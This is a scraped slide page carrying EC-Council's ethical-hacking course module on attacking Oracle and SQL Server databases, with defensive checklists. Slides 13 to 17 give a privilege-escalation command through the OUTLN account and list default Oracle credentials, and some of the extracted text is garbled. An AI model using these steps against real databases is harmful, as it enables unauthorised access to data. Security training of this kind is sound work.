Suche senden
Hochladen
Ce Hv6 Module 42 Hacking Database Servers
•
2 gefällt mir
•
2,145 views
K
Kislaychd
Folgen
Technologie
News & Politik
Melden
Teilen
Melden
Teilen
1 von 35
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
Ce Hv6 Module 43 Cyber Warfare Hacking Al Qaida And Terrorism
Ce Hv6 Module 43 Cyber Warfare Hacking Al Qaida And Terrorism
Kislaychd
Ce Hv6 Module 44 Internet Content Filtering Techniques
Ce Hv6 Module 44 Internet Content Filtering Techniques
Kislaychd
Phishing
Phishing
defquon
Ce hv6 module 14 denial of service TH3 professional security
Ce hv6 module 14 denial of service TH3 professional security
defquon
TD3 Drofessional Developper CEH trojans & backdoors
TD3 Drofessional Developper CEH trojans & backdoors
th3prodevelopper
TH3 Professional Developper CEH hacking email accounts
TH3 Professional Developper CEH hacking email accounts
th3prodevelopper
Module 2 threats-b
Module 2 threats-b
BbAOC
Ceh V5 Module 07 Sniffers
Ceh V5 Module 07 Sniffers
Mina Fawzy
Empfohlen
Ce Hv6 Module 43 Cyber Warfare Hacking Al Qaida And Terrorism
Ce Hv6 Module 43 Cyber Warfare Hacking Al Qaida And Terrorism
Kislaychd
Ce Hv6 Module 44 Internet Content Filtering Techniques
Ce Hv6 Module 44 Internet Content Filtering Techniques
Kislaychd
Phishing
Phishing
defquon
Ce hv6 module 14 denial of service TH3 professional security
Ce hv6 module 14 denial of service TH3 professional security
defquon
TD3 Drofessional Developper CEH trojans & backdoors
TD3 Drofessional Developper CEH trojans & backdoors
th3prodevelopper
TH3 Professional Developper CEH hacking email accounts
TH3 Professional Developper CEH hacking email accounts
th3prodevelopper
Module 2 threats-b
Module 2 threats-b
BbAOC
Ceh V5 Module 07 Sniffers
Ceh V5 Module 07 Sniffers
Mina Fawzy
TH3 Professional Developper google hacking
TH3 Professional Developper google hacking
th3prodevelopper
S nandakumar
S nandakumar
IPPAI
Security Wars
Security Wars
Ikuo Takahashi
Operating Systems: Computer Security
Operating Systems: Computer Security
Damian T. Gordon
20120208 Strategical approach to tacle cybercrime & the botnet threat
20120208 Strategical approach to tacle cybercrime & the botnet threat
Luc Beirens
Module 8 (denial of service)
Module 8 (denial of service)
Wail Hassan
2 phishing
2 phishing
Yadavalli Thripura
Ce hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsers
Vi Tính Hoàng Nam
Modern cyber threats_and_how_to_combat_them_panel
Modern cyber threats_and_how_to_combat_them_panel
Ramsés Gallego
Network Security
Network Security
Mohammed Adam
Computer security risks
Computer security risks
Aasim Mushtaq
Cyber law assignment
Cyber law assignment
cparimala
Information-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptx
anbersattar
Cybercrime
Cybercrime
Vinil Patel
TH3 Professional Developper CEH social engineering
TH3 Professional Developper CEH social engineering
th3prodevelopper
Computer Security risks Shelly
Computer Security risks Shelly
Adeel Khurram
Computer virus
Computer virus
vazhichal12
computer security
computer security
Azhar Akhtar
Social engineering
Social engineering
lokenra
2012 State of Mobile Survey Global Key Findings
2012 State of Mobile Survey Global Key Findings
Symantec
The Hackers Dictionary
The Hackers Dictionary
alanocu
prova
prova
guest4e3d2e
Weitere ähnliche Inhalte
Was ist angesagt?
TH3 Professional Developper google hacking
TH3 Professional Developper google hacking
th3prodevelopper
S nandakumar
S nandakumar
IPPAI
Security Wars
Security Wars
Ikuo Takahashi
Operating Systems: Computer Security
Operating Systems: Computer Security
Damian T. Gordon
20120208 Strategical approach to tacle cybercrime & the botnet threat
20120208 Strategical approach to tacle cybercrime & the botnet threat
Luc Beirens
Module 8 (denial of service)
Module 8 (denial of service)
Wail Hassan
2 phishing
2 phishing
Yadavalli Thripura
Ce hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsers
Vi Tính Hoàng Nam
Modern cyber threats_and_how_to_combat_them_panel
Modern cyber threats_and_how_to_combat_them_panel
Ramsés Gallego
Network Security
Network Security
Mohammed Adam
Computer security risks
Computer security risks
Aasim Mushtaq
Cyber law assignment
Cyber law assignment
cparimala
Information-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptx
anbersattar
Cybercrime
Cybercrime
Vinil Patel
TH3 Professional Developper CEH social engineering
TH3 Professional Developper CEH social engineering
th3prodevelopper
Computer Security risks Shelly
Computer Security risks Shelly
Adeel Khurram
Computer virus
Computer virus
vazhichal12
computer security
computer security
Azhar Akhtar
Social engineering
Social engineering
lokenra
Was ist angesagt?
(19)
TH3 Professional Developper google hacking
TH3 Professional Developper google hacking
S nandakumar
S nandakumar
Security Wars
Security Wars
Operating Systems: Computer Security
Operating Systems: Computer Security
20120208 Strategical approach to tacle cybercrime & the botnet threat
20120208 Strategical approach to tacle cybercrime & the botnet threat
Module 8 (denial of service)
Module 8 (denial of service)
2 phishing
2 phishing
Ce hv6 module 53 hacking web browsers
Ce hv6 module 53 hacking web browsers
Modern cyber threats_and_how_to_combat_them_panel
Modern cyber threats_and_how_to_combat_them_panel
Network Security
Network Security
Computer security risks
Computer security risks
Cyber law assignment
Cyber law assignment
Information-Security-Lecture-7.pptx
Information-Security-Lecture-7.pptx
Cybercrime
Cybercrime
TH3 Professional Developper CEH social engineering
TH3 Professional Developper CEH social engineering
Computer Security risks Shelly
Computer Security risks Shelly
Computer virus
Computer virus
computer security
computer security
Social engineering
Social engineering
Andere mochten auch
2012 State of Mobile Survey Global Key Findings
2012 State of Mobile Survey Global Key Findings
Symantec
The Hackers Dictionary
The Hackers Dictionary
alanocu
prova
prova
guest4e3d2e
Waterhole Attack
Waterhole Attack
Symantec
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunick
amiable_indian
Symantec Mobile Security Whitepaper June 2011
Symantec Mobile Security Whitepaper June 2011
Symantec
Chfi V3 Module 01 Computer Forensics In Todays World
Chfi V3 Module 01 Computer Forensics In Todays World
gueste0d962
Cyber crime
Cyber crime
Tushar Malhotra
Andere mochten auch
(8)
2012 State of Mobile Survey Global Key Findings
2012 State of Mobile Survey Global Key Findings
The Hackers Dictionary
The Hackers Dictionary
prova
prova
Waterhole Attack
Waterhole Attack
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunick
Symantec Mobile Security Whitepaper June 2011
Symantec Mobile Security Whitepaper June 2011
Chfi V3 Module 01 Computer Forensics In Todays World
Chfi V3 Module 01 Computer Forensics In Todays World
Cyber crime
Cyber crime
Ähnlich wie Ce Hv6 Module 42 Hacking Database Servers
Ce hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database servers
Vi Tính Hoàng Nam
nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
TH3 Professional Developper CEH denial of service
TH3 Professional Developper CEH denial of service
th3prodevelopper
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
Osama Mustafa
Ceh v5 module 08 denial of service
Ceh v5 module 08 denial of service
Vi Tính Hoàng Nam
Website security systems
Website security systems
Mobile88
Computer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptx
ShivamBajaj36
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
siti829412
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologies
Vi Tính Hoàng Nam
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
TYPES OF CYBER ATTACKS.pptx
TYPES OF CYBER ATTACKS.pptx
RohanMistry15
Security and Linux Security
Security and Linux Security
Rizky Ariestiyansyah
A DevOps Guide to Web Application Security
A DevOps Guide to Web Application Security
Imperva Incapsula
Web security
Web security
dogangcr
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
Eric Vanderburg
Ethical Hacking justvamshi .pptx
Ethical Hacking justvamshi .pptx
vamshimatangi
Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3
Kabul Education University
Exploitation techniques and fuzzing
Exploitation techniques and fuzzing
G Prachi
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
M Mehdi Ahmadian
Ähnlich wie Ce Hv6 Module 42 Hacking Database Servers
(20)
Ce hv6 module 42 hacking database servers
Ce hv6 module 42 hacking database servers
nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt
TH3 Professional Developper CEH denial of service
TH3 Professional Developper CEH denial of service
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
Ceh v5 module 08 denial of service
Ceh v5 module 08 denial of service
Website security systems
Website security systems
Computer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptx
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologies
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TYPES OF CYBER ATTACKS.pptx
TYPES OF CYBER ATTACKS.pptx
Security and Linux Security
Security and Linux Security
A DevOps Guide to Web Application Security
A DevOps Guide to Web Application Security
Web security
Web security
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
Ethical Hacking justvamshi .pptx
Ethical Hacking justvamshi .pptx
Cryptography and Network security # Lecture 3
Cryptography and Network security # Lecture 3
Exploitation techniques and fuzzing
Exploitation techniques and fuzzing
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
هک پایگاه داده و راهکارهای مقابلهDatabases hacking, safeguards and counterme...
Kürzlich hochgeladen
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
V3cube
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
apidays
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
Antenna Manufacturer Coco
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
debabhi2
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
hans926745
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Andrey Devyatkin
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
DianaGray10
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The Digital Insurer
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Rafal Los
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
Pixlogix Infotech
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
Kürzlich hochgeladen
(20)
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Ce Hv6 Module 42 Hacking Database Servers
1.
Ethical Hacking and Countermeasures Version
6 Module Mod le XLII Hacking Database Servers
2.
News
Source: http://searchsecurity.techtarget.com/ Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
3.
Module Objective
This module will familiarize you with: Database Servers Attacking Oracle g How to Break into an Oracle Database Oracle Worm Hacking SQL Server Ten H k T i k T Hacker Tricks to Exploit E l i How SQL Server is Hacked Tools Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
4.
Module Flow
How SQL Server Database Servers Oracle Worm is Hacked Attacking Oracle Hacking SQL Server Tools How to Break into Ten Hacker Tricks to an Oracle Database Exploit Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
5.
Introduction
Databases are the heart of a commercial website An attack on database servers can cause a great monetary loss for the company Database servers are usually hacked to get the critical information Mistakes made by the web designers can reveal the databases of the server to the hacker Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
6.
Hacking O ac
e ac g Oracle Database Server Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
7.
Attacking Oracle
Finding an Oracle database server on network is done using TCP port scan Once the Oracle database server h b O h O l d b has been di discovered, d the first port of call is the TNS Listener Using PL/SQL Injection, attackers can potentially elevate their level of privilege from a low-level PUBLIC account to an account with DBA-level privileges Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
8.
Security Issues in
Oracle SQL Injection SQL Manipulation Code Injection Attack Buffer Overflow Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
9.
Types of Database
Attacks Excessive privileges: p g • When users (or applications) are granted database privileges that exceed the requirements of their job function, these privileges may be used to gain access to confidential information Solution: • Query-level access control as it restricts privileges to minimum-required operations and data Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
10.
Types of Database
Attacks (cont d) (cont’d) Privilege abuse: • Privilege is abused when a system user performs an action that is not in accordance with corporate policy or law • U Users may abuse legitimate data access privileges f b l ii d i il for unauthorized purposes Solution: •AAccess control policies th t apply not only t what d t i t l li i that l t l to h t data is accessible, but how data is accessed • By enforcing policies for time of day, location, and application client and volume of data retrieved, it is possible to identify users who are abusing access privileges Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
11.
Types of Database
Attacks (cont d) (cont’d) Platform vulnerabilities: • Vulnerabilities in underlying operating systems may lead to unauthorized data access and corruption Solution: • IPS tools are a good way to identify and/or block attacks designed to exploit known database platform vulnerabilities Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
12.
Types of Database
Attacks (cont d) (cont’d) Denial of service: • Common DoS techniques include buffer overflows, data corruption, network flooding, and resource consumption Database protocol vulnerabilities: • Vulnerabilities in database protocols may allow unauthorized data access, corruption access corruption, or availability • Protocol attacks can be defeated by parsing and validating SQL communications to make sure they are not malformed Exposure of backup data: • Some recent high profile attacks have involved theft f database b k t th ft of d t b backup tapes and h d di k d hard disks Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
13.
How to Break
into an Oracle Database and Gain DBA Privileges New databases made with a create database command are installed with a user called OUTLN This schema is used to hold information about stored outlines for the plan stability feature y User has an easily guessable password and is left unlocked when database is created DBAs commonly overlook this but it is so important to either change the password or lock the account because it can be used to gain DBA privileges The critical system privilege granted by default to the OUTLN user is EXECUTE ANY PROCEDURE If you can execute any procedure i the d b d in h database, then try this one, and l k f h hi d look for the privileges you can gain Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
14.
How to Break
into an Oracle Database and Gain DBA Privileges (cont’d) (cont d) $ sqlplus outln/xxxx@DEMO SQL> select * from session_privs; SQL*Plus: Release 9.2.0.3.0 PRIVILEGE - Production on Thu Sep 4 ---------------------------- 13:58:14 2003 ------------ Copyright (c) 1982, 2002, CREATE SESSION Oracle Corporation. All ALTER SESSION UNLIMITED TABLESPACE rights reserved. CREATE TABLE Connected to: CREATE CLUSTER Oracle9i Enterprise CREATE SYNONYM Edition Release 9.2.0.3.0 CREATE VIEW CREATE SEQUENCE - 64bit Production CREATE DATABASE LINK With the Partitioning, CREATE PROCEDURE OLAP and Oracle Data EXECUTE ANY PROCEDURE Mining options CREATE TRIGGER JServer Release 9.2.0.3.0 CREATE TYPE - Production CREATE OPERATOR CREATE INDEXTYPE Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
15.
How to Break
into an Oracle Database and Gain DBA Privileges (cont’d) (cont d) SQL>execdbms_repcat_admin.grant_admin_any_schema('OUTLN'); PL/SQL procedure successfully completed. SQL> select * from session_p Q privs; PRIVILEGE ---------------------------------------- CREATE SESSION ALTER SESSION UNLIMITED TABLESPACE CREATE TABLE CREATE ANY TABLE ALTER ANY TABLE DROP ANY TABLE COMMENT ANY TABLE CO SELECT ANY TABLE INSERT ANY TABLE UPDATE ANY TABLE DELETE ANY TABLE CREATE CLUSTER CREATE ANY CLUSTER ALTER ANY CLUSTER DROP ANY CLUSTER CREATE ANY INDEX Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
16.
How to Break
into an Oracle Database and Gain DBA Privileges (cont’d) (cont d) ALTER ANY INDEX PROCEDURE DROP ANY INDEX EXECUTE ANY PROCEDURE CREATE SYNONYM CREATE TRIGGER CREATE ANY SYNONYM CREATE ANY TRIGGER DROP ANY SYNONYM ALTER ANY TRIGGER CREATE PUBLIC SYNONYM DROP ANY TRIGGER DROP PUBLIC SYNONYM CREATE ANY SNAPSHOT CREATE VIEW ALTER ANY SNAPSHOT CREATE ANY VIEW DROP ANY SNAPSHOT DROP ANY VIEW CREATE TYPE CREATE SEQUENCE CREATE ANY TYPE CREATE ANY SEQUENCE ALTER ANY TYPE ALTER ANY SEQUENCE DROP ANY TYPE DROP ANY SEQUENCE CREATE OPERATOR CREATE DATABASE LINK CREATE ANY OPERATOR CREATE PROCEDURE DROP ANY OPERATOR CREATE ANY PROCEDURE CREATE INDEXTYPE ALTER ANY PROCEDURE CREATE ANY INDEXTYPE DROP ANY DROP ANY INDEXTYPE Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
17.
Oracle Worm: Voyager
Beta Voyager Beta worm attacks Oracle servers using default accounts and passwords It snarfs the local IP address, lops off the last octet and replaces it with the value of ‘220’ It attempts a TCP connection to TCP p p port 1521, where the Oracle connection service listens 5 , It then tries a series of usernames and passwords: 'system'/'manager', 'sys'.'change_on_install', 'dbsnmp'/'dbsnmp', 'outln'/'outln', / / 'scott'/'tiger', 'mdsys'/'mdsys', 'ordcommon'/'ordcommon‘ If it can authenticate, create table 'X' with column 'Y‘; it does not appear to transfer the , ; pp payload Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
18.
Hacking SQL Server
g Q Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
19.
Ten Hacker Tricks
to Exploit SQL Server Systems The following are the tricks to exploit SQL Server systems: • Direct Connections via the Internet • Vulnerability scanning • Enumerating the SQL Server Resolution Service • Cracking SA passwords • Direct exploit Direct-exploit attacks • SQL injection • Blind SQL injection • Reverse engineering the system • Google h k G l hacks • Perusing Web site source code Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
20.
Screenshots for Hacker
Tricks Vulnerability Scanning SQL Injection Direct-exploit Attacks Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
21.
How SQL Server
is Hacked Hacker uses the following: • MS SQL Server, Developer Edition • MS SQL Client tools such as Query Analyzer and odbcping • NGSSniff • NGSSQLCrack • NGSSQuirreL • Microsoft Visual C++ Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
22.
Query Analyzer
Microsoft SQL Server SQL Query Analyzer is a graphical tool that allows you to: • Create queries and other SQL scripts and execute them against SQL Server databases (Query window) S d t b (Q i d ) • Quickly create commonly used database objects from predefined scripts (Templates) • Quickly copy existing database objects (Object Browser scripting feature) • Execute stored procedures without knowing the parameters(Object Browser procedure execution feature) • D b stored procedures(T-SQL D b Debug d d (T SQL Debugger) ) • Debug query performance problems(Show Execution Plan, Show Server Trace, Show Client Statistics, and Index Tuning Wizard) • Add frequently used commands to the Tools menu(customized Tools menu feature) Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
23.
odbcping Utility
The odbcping utility tests the integrity of an ODBC data source and p g y g y the ability of the client to connect to a server Syntax: y odbcping [/?] | [ { -Sserver_name [instance_name] | -Ddata_source } [- Ulogin_id] [-Ppassword] ] Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
24.
Tool: ASPRunner Professional
ASPRunner Professional enables to create a set of ASP pages to access and modify data from a database, including Oracle, i l di O l SQL S Server, MS AAccess, DB M SQL DB2, MySQL, FileMaker, or any other ODBC datasource The generated ASP pages can optionally allow user to search, edit, delete, and add data into database In addition, it can restrict access to data with a login page either with a specified username/password or existing user information from database You can specify which fields to include and which fields should b searchable h ld be h bl Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
25.
ASPRunner Professional:
Screenshot Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
26.
Tool: FlexTracer
FlexTracer enables to trace SQL-queries for various RDBMS and functions exported by DLLs It creates a history log containing all invoked operations, as well as their results, parameters, and execution times FlexTracer currently supports Oracle (OCI), MS SQLServer DB-Lib, MySQL, Interbase/Firebird, ODBC, as well as file input/output, and registry read/write operations The created log files can be saved in HTML format for future analysis Features: • Customizable Script Engine • SQL Assembler plugin to merge SQL statements with parameters Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
27.
FlexTracer: Screenshot
Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
28.
Security T l
S it Tools Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
29.
Security Tools
AppRadar: • Used for detecting and exploiting database vulnerabilities • It can simultaneously protect an unlimited number of MS SQL and Oracle databases DbEncrypt: • Designed to protect data at rest utilizing strong encryption built upon a strong key management mechanism • It handles all user access and encryption/decryption operations in the yp / yp p background Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
30.
Security Tools (cont’d)
AppDetective: • It is a network-based, penetration testing/vulnerability assessment scanner that locates and determines security strength of databases within a network • After locating, it examines, reports, and help fix security holes, and misconfigurations Oracle Selective Audit: • It is an Oracle consulting solution that provides capabilities to monitor user access to data within an Oracle database; including the ability to capture and play back SQL queries • It provides security specialists with a means to manage and control auditing without involving the DBA Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
31.
SQL Server Security
Best Practices: Administrator Checklist Physical security • Ensure the physical security of your server Firewalls • P t a fi Put firewall b t ll between your server and th I t d the Internet t Isolation of services • Isolate services to reduce the risk that a compromised service could be used to p • Run separate SQL Server services under separate Windows accounts Service accounts • Create Windows accounts with the lowest possible privileges for running SQL Server services File System • Use NTFS • Use RAID for critical data files Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
32.
SQL Server Security
Best Practices: Developer Checklist Use ownership chaining effectively • Use ownership chaining within a single database to simplify permissions management Use roles to simplify permission management and ownership • Assign permissions to roles rather than directly to users Turn on encryption (SSL or IPSEC) • Enable encrypted connections to your server, and consider allowing only encrypted connections i Do not propagate SQL Server errors back to user • Application should not return SQL Server errors to the end user. Log them instead, or user instead transmit them to the system administrator Prevent SQL injection • Defend against SQL injection by validating all user input before transmitting it to the server Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
33.
Summary
Databases are the heart of a commercial website Mistakes made by the web designers can reveal the databases of the server to the hacker Database hacking is done through browser An Oracle database server on network is found through TCP port scan ASPRunner allows to publish an existing database FlexTracer enables to trace SQL-queries for various RDBMS and SQL queries functions exported by DLLs Copyright © by EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
34.
Copyright © by
EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
35.
Copyright © by
EC-Council EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Jetzt herunterladen